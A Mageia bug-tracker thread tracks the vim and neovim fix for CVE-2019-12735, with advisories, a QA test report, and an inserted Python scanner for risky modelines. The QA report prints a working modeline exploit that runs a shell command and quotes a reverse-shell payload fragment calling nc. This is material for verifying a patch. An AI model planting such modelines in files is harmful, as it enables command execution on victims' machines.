A security issue fixed upstream in vim and neovim has been announced: https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md The issue is fixed upstream in vim 8.1.1365 and neovim 0.3.6. Mageia 6 and Mageia 7 are also affected.
Whiteboard: (none) => MGA7TOO, MGA6TOO
Assigning to the neovim maintainer, because he might have more time than the vim maintainer. CC'ing the vim maintainer.
CC: (none) => marja11, thierry.vignaud
Assignee: bugsquad => smelror
Neovim 0.3.7 pushed to updates_testing
RedHat has issued an advisory for vim on June 26: https://access.redhat.com/errata/RHSA-2019:1619
Advisory
========

Neovim has been updated to fix a security issue.

CVE-2019-12735: getchar.c in Neovim before 0.3.6 allows remote attackers to execute arbitrary OS commands via the :source! command in a modeline, as demonstrated by assert_fails or nvim_input in Neovim.

References
==========

https://nvd.nist.gov/vuln/detail/CVE-2019-12735

Files
=====

Uploaded to core/updates_testing

neovim-0.3.7-1.mga7
neovim-data-0.3.7-1.mga7

from neovim-0.3.7-1.mga7.src.rpm
Assignee: smelror => qa-bugs
vim needs to be fixed too.
Version: Cauldron => 7
Whiteboard: MGA7TOO, MGA6TOO => MGA6TOO
Assignee: qa-bugs => thierry.vignaud
CC: (none) => qa-bugs, smelror
Debian has issued an advisory for this on June 13: https://www.debian.org/security/2019/dsa-4467

Ubuntu has issued advisories for this on June 11: https://usn.ubuntu.com/4016-1/ https://usn.ubuntu.com/4016-2/
Severity: normal => major
Debian has issued an advisory for this on July 23: https://www.debian.org/security/2019/dsa-4487
Fedora has issued an advisory for vim on June 6: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2BMDSHTF754TITC6AQJPCS5IRIDMMIM7/

We are still missing a vim update for Mageia 7. Someone please take care of it.
CC: (none) => pkg-bugs
Status comment: (none) => neovim has been updated, vim update still needed
Patched package uploaded for Mageia 7.

Advisory:
========================

Updated vim package fixes security vulnerabilities:

It was discovered that Vim before 8.1.1365 and Neovim before 0.3.6 did not restrict the `:source!` command when executed in a sandbox. This allows remote attackers to take advantage of the modeline feature to inject arbitrary commands when a specially crafted file is opened (CVE-2019-12735).

References:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2BMDSHTF754TITC6AQJPCS5IRIDMMIM7/
https://nvd.nist.gov/vuln/detail/CVE-2019-12735
========================

Updated packages in core/updates_testing:
========================

vim-common-8.1.1048-1.1.mga7.x86_64.rpm
vim-enhanced-8.1.1048-1.1.mga7.x86_64.rpm
vim-minimal-8.1.1048-1.1.mga7.x86_64.rpm
vim-X11-8.1.1048-1.1.mga7.x86_64.rpm

from vim-8.1.1048-1.1.mga7.src.rpm
Whiteboard: MGA6TOO => (none)
CC: (none) => mrambo
Assignee: thierry.vignaud => qa-bugs
Thanks. We'll need to clarify in the advisory that this update includes both vim and neovim.
Status comment: neovim has been updated, vim update still needed => (none)
mga7, x86_64

$ rpm -qa | grep neovim
neovim-0.3.5-1.mga7
neovim-data-0.3.5-1.mga7
nodejs-neovim-4.5.0-1.mga7

CVE-2019-12735
https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md

Two PoC available.

$ cat poc.txt
:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

$ cat shell.txt
\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 999!

*Before update*

This test demonstrates the vulnerability.

$ nvim poc.txt
<This executes the 'uname -a' command>
Linux canopus 5.1.14-desktop-1.mga7 #1 SMP Sat Jun 22 10:35:14 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Press ENTER or type command to continue
:q

$ nvim shell.txt
This starts a normal vi session without the reverse terminal and system call.

$ grep nomodelines /usr/share/vim/vimrc
returns nothing. nomodelines is supposed to prevent the use of custom modelines in files to be edited by vim. So in the default configuration file that protection is not there. However, the exploit is not delivered either, which implies that the vulnerability has already been patched.

*After update*
- neovim-0.3.7-1.mga7.x86_64
- neovim-data-0.3.7-1.mga7.noarch
- vim-common-8.1.1048-1.1.mga7.x86_64
- vim-enhanced-8.1.1048-1.1.mga7.x86_64
- vim-minimal-8.1.1048-1.1.mga7.x86_64
- vim-X11-8.1.1048-1.1.mga7.x86_64

$ nvim shell.txt
Normal session, as before.

$ nvim poc.txt
Normal session, so the problem has been fixed.

For good measure, running these two tests with the vim, vi variants returned the same results. Finished off this report using nvim.

*vim looks OK.
CC: (none) => tarazed25
Whiteboard: (none) => MGA7-64-OK
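The QA report above verifies the fix by opening the PoC files and by grepping the system vimrc. As a complementary defensive check, here is an added Python example (it is not part of the Mageia report, nor of vim or neovim) that scans a file for Vim modelines and flags options whose values Vim evaluates as expressions, such as the `fde=` (foldexpr) option that the poc.txt modeline sets. It mirrors Vim's default of inspecting the first and last five lines (`modelines=5`); the option list, the regex-based modeline parser and the sample inputs are constructed for this example and simplified relative to Vim's own parser. For reference, the option that turns modeline processing off is `set nomodeline` (`modeline` is the boolean switch; `modelines` is the number of lines inspected).

```python
"""Flag Vim modelines that set expression-evaluated options.

Added example for triaging files around CVE-2019-12735; not code from the
Mageia report or from vim/neovim. Option list and samples are constructed.
"""
import re
from dataclasses import dataclass
from typing import List

# Options whose value Vim evaluates as an expression (short and long names).
# Constructed subset; ':help option-list' has the full set.
EXPR_OPTIONS = {
    "fde", "foldexpr", "fdt", "foldtext", "stl", "statusline",
    "inde", "indentexpr", "fex", "formatexpr", "inex", "includeexpr",
    "tal", "tabline", "bexpr", "balloonexpr",
}

# A modeline marker must be at line start or preceded by whitespace.
MODELINE_RE = re.compile(r"(?:^|\s)(?:vi|vim|Vim|ex):\s*(?P<body>.*)$")


@dataclass
class Finding:
    line_no: int   # 1-based line number in the scanned text
    option: str    # option name without any +=, -= or ^= suffix
    value: str     # value with backslash escapes resolved
    reason: str


def split_options(body: str) -> List[str]:
    """Split a modeline body into option tokens.

    Handles both forms: 'vi:opt:opt' (separated by ':' or whitespace) and
    'vim: set opt opt:' (whitespace-separated, ended by an unescaped ':').
    A backslash escapes the following character in either form.
    """
    m = re.match(r"se(?:t)?\s+(.*)", body)
    if m:
        rest = m.group(1)
        end = re.search(r"(?<!\\):", rest)
        body = rest[: end.start()] if end else rest
    tokens, cur, i = [], [], 0
    while i < len(body):
        ch = body[i]
        if ch == "\\" and i + 1 < len(body):
            cur.append(body[i + 1])
            i += 2
            continue
        if ch == ":" or ch.isspace():
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
        i += 1
    if cur:
        tokens.append("".join(cur))
    return tokens


def scan_text(text: str, modelines: int = 5) -> List[Finding]:
    """Return findings for modelines in the first/last `modelines` lines."""
    lines = text.splitlines()
    head = range(min(modelines, len(lines)))
    tail = range(max(0, len(lines) - modelines), len(lines))
    findings: List[Finding] = []
    for i in sorted(set(head) | set(tail)):
        m = MODELINE_RE.search(lines[i])
        if not m:
            continue
        for tok in split_options(m.group("body")):
            name, _, value = tok.partition("=")
            name = name.rstrip("+-^")
            if name in EXPR_OPTIONS:
                reason = "expression-evaluated option set from a modeline"
            elif re.search(r"\bsource\b|system\(", value):
                reason = "command-like text in option value"
            else:
                continue
            findings.append(Finding(i + 1, name, value, reason))
    return findings


# Constructed samples: the report's poc.txt modeline, and a benign trailer
# comment of the kind many source files carry.
SUSPICIOUS = (
    "some text\n"
    ':!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\\!\\ \\%"):fdl=0:fdt="\n'
)
BENIGN = "int main(void) { return 0; }\n/* vim: set ts=4 sw=4 et: */\n"

if __name__ == "__main__":
    for label, text in (("poc-like", SUSPICIOUS), ("benign", BENIGN)):
        hits = scan_text(text)
        print(f"{label}: {len(hits)} finding(s)")
        for f in hits:
            print(f"  line {f.line_no}: {f.option}={f.value!r} ({f.reason})")
```

A finding means the file would set an expression option when opened with modelines enabled, which is what an unpatched editor turned into command execution; the benign `set ts=4 sw=4 et:` trailer produces none. Scanning only the head and tail of each file keeps the check cheap enough to run over a whole checkout of files from untrusted sources.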
Validating. Advisory information in Comment 4, Comment 9, and Comment 10.
Keywords: (none) => validated_update
CC: (none) => andrewsfarm, sysadmin-bugs
CC: (none) => tmb
Keywords: (none) => advisory
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2020-0082.html
Resolution: (none) => FIXED
Status: NEW => RESOLVED